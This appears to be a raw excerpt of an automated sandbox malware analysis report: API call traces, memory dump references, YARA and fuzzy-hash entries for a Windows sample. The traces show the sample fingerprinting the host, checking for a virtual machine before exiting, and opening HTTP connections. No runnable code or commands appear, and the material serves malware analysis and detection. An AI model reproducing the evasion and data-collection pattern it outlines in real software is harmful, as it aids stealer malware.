                                      • RegQueryValueExA.ADVAPI32(00000000,009DB228,00000000,000F003F,?,00000400), ref: 004184EC
                                      • lstrlenA.KERNEL32(?), ref: 00418501
                                      • RegQueryValueExA.ADVAPI32(00000000,009DB258,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                      • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                      • Opcode Fuzzy Hash: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                      • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A51
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A68
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00914A7F
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914AA0
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00914AB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                      • Instruction ID: cf6eae7317acbf7106d4adbc02a330941be74cfde7f70d63f2bd408a7365ef5b
                                      • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                      • Instruction Fuzzy Hash: EA2118B5D00219ABDF14DFA4E849BED7B75FF44321F108225F925A7290EB706A05CF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0092790B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00927912
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 00927944
                                      • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 00927965
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0092796F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction ID: afb5fd38bb087f6cbcff176636712bb8e9d1d73a2d96904319cdb38aa8153745
                                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction Fuzzy Hash: 39018FBDA80304BFEB00DBE0EC49FADB7BDEB48700F004154FA05A7284D6749940CB51
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                      • RegOpenKeyExA.ADVAPI32(80000002,009D7918,00000000,00020119,00000000), ref: 004176DD
                                      • RegQueryValueExA.ADVAPI32(00000000,009DB240,00000000,00000000,?,000000FF), ref: 004176FE
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3466090806-2517555085
                                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                      • RegOpenKeyExA.ADVAPI32(80000002,009D7918,00000000,00020119,004176B9), ref: 0041775B
                                      • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                      • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3466090806-1022791448
                                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                      APIs
                                      • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                      • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                      • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID: :A$:A
                                      • API String ID: 1378416451-1974578005
                                      • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                      • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009175A1
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00917618
                                      • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00917674
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 009176B9
                                      • HeapFree.KERNEL32(00000000), ref: 009176C0
                                        • Part of subcall function 009194A7: vsprintf_s.MSVCRT ref: 009194C2
                                      • task.LIBCPMTD ref: 009177BC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                      • String ID:
                                      • API String ID: 700816787-0
                                      • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                      • Instruction ID: bf6b8bfb4532b92b1f63b0ee97a2b7e74de5e5b351695081450a89fadecf1410
                                      • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                      • Instruction Fuzzy Hash: DA613CB5A0426D9BDB25DB90CC55FE9B7B8BF88300F0085E9E649A6181DF705BC5CF90
                                      APIs
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 009164E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00916548
                                        • Part of subcall function 009164E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 0091656A
                                        • Part of subcall function 009164E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0091659C
                                        • Part of subcall function 009164E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 009165EC
                                        • Part of subcall function 009164E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00916626
                                        • Part of subcall function 009164E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00916638
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0092557F
                                      • lstrlen.KERNEL32(00000000), ref: 00925596
                                        • Part of subcall function 00929097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009290B9
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 009255CB
                                      • lstrlen.KERNEL32(00000000), ref: 009255EA
                                      • strtok.MSVCRT(00000000,?), ref: 00925605
                                      • lstrlen.KERNEL32(00000000), ref: 00925615
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID:
                                      • API String ID: 3532888709-0
                                      • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                      • Instruction ID: d5a7af6e8bc105a300819bdd4811dc778d3b0bf9c6c906faf98f10752ab4b9d2
                                      • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                      • Instruction Fuzzy Hash: D5512A76900218EFCF18FFA0EE92BED7775AF90700F904018F90AA6596DB346B44CB52
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00927345
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00927574,004205BD), ref: 00927383
                                      • memset.MSVCRT ref: 009273D1
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00927525
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID:
                                      • API String ID: 224852652-0
                                      • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                      • Instruction ID: 5db5dd0c49e33a5b76f238a87035971c3eb34248f6ecfcbecc7861e7d044ab37
                                      • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                      • Instruction Fuzzy Hash: D3519EB1D04228DFCB14EBA0EC85FEDF7B5AF44305F1044A8E215B6185DB346A88CF59
                                      APIs
                                      • memset.MSVCRT ref: 0092433C
                                      • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 0092435B
                                      • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 0092437F
                                      • RegCloseKey.ADVAPI32(?), ref: 00924389
                                      • lstrcat.KERNEL32(?,00000000), ref: 009243AE
                                      • lstrcat.KERNEL32(?,0064A168), ref: 009243C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                      • Instruction ID: 0508b1709b821e907fd8e6f4508c07ae08e5cb95079b97138693add85c990fe8
                                      • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                      • Instruction Fuzzy Hash: 7041C3B6940108BBDB14EBE0EC46FEE733DAB99300F00455CB725971C1EA755A988BE2
                                      APIs
                                      • memset.MSVCRT ref: 004140D5
                                      • RegOpenKeyExA.ADVAPI32(80000001,009DBB00,00000000,00020119,?), ref: 004140F4
                                      • RegQueryValueExA.ADVAPI32(?,009DC010,00000000,00000000,00000000,000000FF), ref: 00414118
                                      • RegCloseKey.ADVAPI32(?), ref: 00414122
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                      • lstrcatA.KERNEL32(?,009DC028), ref: 0041415B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                      • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                      • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                      • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                      APIs
                                      • strtok_s.MSVCRT ref: 00413588
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • strtok_s.MSVCRT ref: 004136D1
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009A94C0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpystrtok_s$lstrlen
                                      • String ID:
                                      • API String ID: 3184129880-0
                                      • Opcode ID: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                      • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                      • Opcode Fuzzy Hash: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                      • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                      APIs
                                      • __lock.LIBCMT ref: 0041B39A
                                        • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                        • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                        • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                      • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                        • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                      • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 2005412495-0
                                      • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                      • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                      • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                      • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                      APIs
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00929B08
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00929B21
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00929B39
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00929B51
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00929B6A
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00929B82
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00929B9A
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00929BB3
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00929BCB
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00929BE3
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00929BFC
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00929C14
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00929C2C
                                        • Part of subcall function 00929AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00929C45
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 00911437: ExitProcess.KERNEL32 ref: 00911478
                                        • Part of subcall function 009113C7: GetSystemInfo.KERNEL32(?), ref: 009113D1
                                        • Part of subcall function 009113C7: ExitProcess.KERNEL32 ref: 009113E5
                                        • Part of subcall function 00911377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00911392
                                        • Part of subcall function 00911377: VirtualAllocExNuma.KERNEL32(00000000), ref: 00911399
                                        • Part of subcall function 00911377: ExitProcess.KERNEL32 ref: 009113AA
                                        • Part of subcall function 00911487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009114A5
                                        • Part of subcall function 00911487: __aulldiv.LIBCMT ref: 009114BF
                                        • Part of subcall function 00911487: __aulldiv.LIBCMT ref: 009114CD
                                        • Part of subcall function 00911487: ExitProcess.KERNEL32 ref: 009114FB
                                        • Part of subcall function 009269D7: GetUserDefaultLangID.KERNEL32 ref: 009269DB
                                        • Part of subcall function 009113F7: ExitProcess.KERNEL32 ref: 0091142D
                                        • Part of subcall function 00927AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0091141E), ref: 00927AE7
                                        • Part of subcall function 00927AB7: RtlAllocateHeap.NTDLL(00000000), ref: 00927AEE
                                        • Part of subcall function 00927AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00927B06
                                        • Part of subcall function 00927B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927B77
                                        • Part of subcall function 00927B47: RtlAllocateHeap.NTDLL(00000000), ref: 00927B7E
                                        • Part of subcall function 00927B47: GetComputerNameA.KERNEL32(?,00000104), ref: 00927B96
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00926D31
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926D4F
                                      • CloseHandle.KERNEL32(00000000), ref: 00926D60
                                      • Sleep.KERNEL32(00001770), ref: 00926D6B
                                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00926D81
                                      • ExitProcess.KERNEL32 ref: 00926D89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                      • Instruction ID: 9600e80a7af79e8e8f30007dcfbc079b998860fd7fa4fd960472a917caf6d700
                                      • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                      • Instruction Fuzzy Hash: 3B312976A40228EBDB04FBF0EC56BFD7379AF94700F500529B112A64DAEF745A44CA62
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00919C53
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919C78
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00919C98
                                      • ReadFile.KERNEL32(000000FF,?,00000000,009116F6,00000000), ref: 00919CC1
                                      • LocalFree.KERNEL32(009116F6), ref: 00919CF7
                                      • CloseHandle.KERNEL32(000000FF), ref: 00919D01
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
